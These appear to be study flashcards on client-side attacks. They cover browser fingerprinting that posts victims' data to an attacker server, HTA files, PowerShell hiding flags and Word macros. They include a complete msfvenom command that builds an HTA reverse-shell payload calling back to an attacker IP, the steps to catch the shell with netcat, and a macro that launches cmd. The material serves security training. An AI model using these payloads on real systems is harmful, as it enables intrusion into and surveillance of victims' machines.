Client-Side Attacks Flashcards
What tool is used for web browser fingerprinting?
Fingerprintjs2
How do we get the broswer fingerprint on a victim machine?
- download fingerprintjs2
- unzip into /var/www/html
- Rename the main directory and move into it’s own directory named ‘fp’:
- - mv fingerprintjs2-master/ fp - Start apache2 server
- Get the victim to browse to the fingerprint2 page at /fp/index.html
- Get the fingerprint data from the fingerprint.txt file using Ajax
How do we get the output of the victim browser fingerprint saved to the attacking machine?
- the default settings of the index.html file save the browser footprint data to the victim machine
- we can instead place Ajax code into the index.html web page that does the browser fingerprinting, and instruct the output to be sent to our attacking machine as an xmlhttp post request and saved as /fp/js.php
- ** the following code gets placed w/in Fingerprint2.get function of index.html ***
- var clientfp = “Client browser fingerprint: “ + murmur + “\n\n”;
- var xmlhttp = new XMLHttpRequest();
- xmlhttp.open(“POST”, “/fp/js.php”);
- xmlhttp.setRequestHeader(“Content-Type”, “application/text”);
- xmlhttp.send(clientfp + timeString + details);
- PHP code then processs the POST request on the attacking server
- In order for this to work, the Apache www-data user needs to be allowed to write to the ‘ftp’ directory
What is a .hta file?
- If a file is created with the extension .hta instead of .html, IE will automatically interpret it as a “HTML Application” (HTA) and offer the ability to execute it using the ‘mshta.exe’ program
- This allows an attacker to execute arbitrary code with the user’s permissions, avoiding the security restrictions normally imposed by IE
How can HTA be used to execute shell commands?
- ** This attack vector allows us to compromise a Windows client through IE
- ActiveXObjects provide access to underlying operating system commands
- This is achieved through WScript (Windows Script Host) Shell Object
- Once we instantiate a WScript Shell object, we can invoke its ‘run’ method in order to launch an application on the target client machine.
How to create an HTA attack?
- use msfvenom with the ‘hta-psh’ output format
- sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta
What command in PowerShell prevents the PowerShell user profile from loading?
- -nop
- - -NoProfile
What command in PowerShell prevents PowerShell from creating a window on the user’s desktop?
- -w hidden
- - -WindowStyle hidden
What are the steps to get a reverse shell on a victim machine with a .hta file created in Msfvenom?
- Create evil.hta with msfvenom
- Host the evil.hta file on Apache2 server
- Launch a Netcat listener
- The user navigates to URL with evil.hta
- User accepts two security warnings
- Get reverse shell
What is one of the oldest and best-known client-side software attack vectors?
Microsoft Word Macro
What is a Macro?
- a series of commands and instructions that are grouped together to accomplish a task programmatically
- Macros can be written from scratch in Visual Basic for Applications (VBA)
What is VBA?
- Visual Basic for Applications
- Fully functional scripting language with full access to ActiveX objects and the WScript Host
What is similar to a ‘function’ in VBA?
- Sub procedure
- the difference between a Sub procedure and Function is that Sub procedures cannot be used in expressions
How is a macro inserted into a Word or Excel document?
- View > Macros
Create a simple macro that opens cmd.exe
– Sub MyMacro()
– CreateObject(“Wscript.Shell”).Run “cmd”
– End Sub
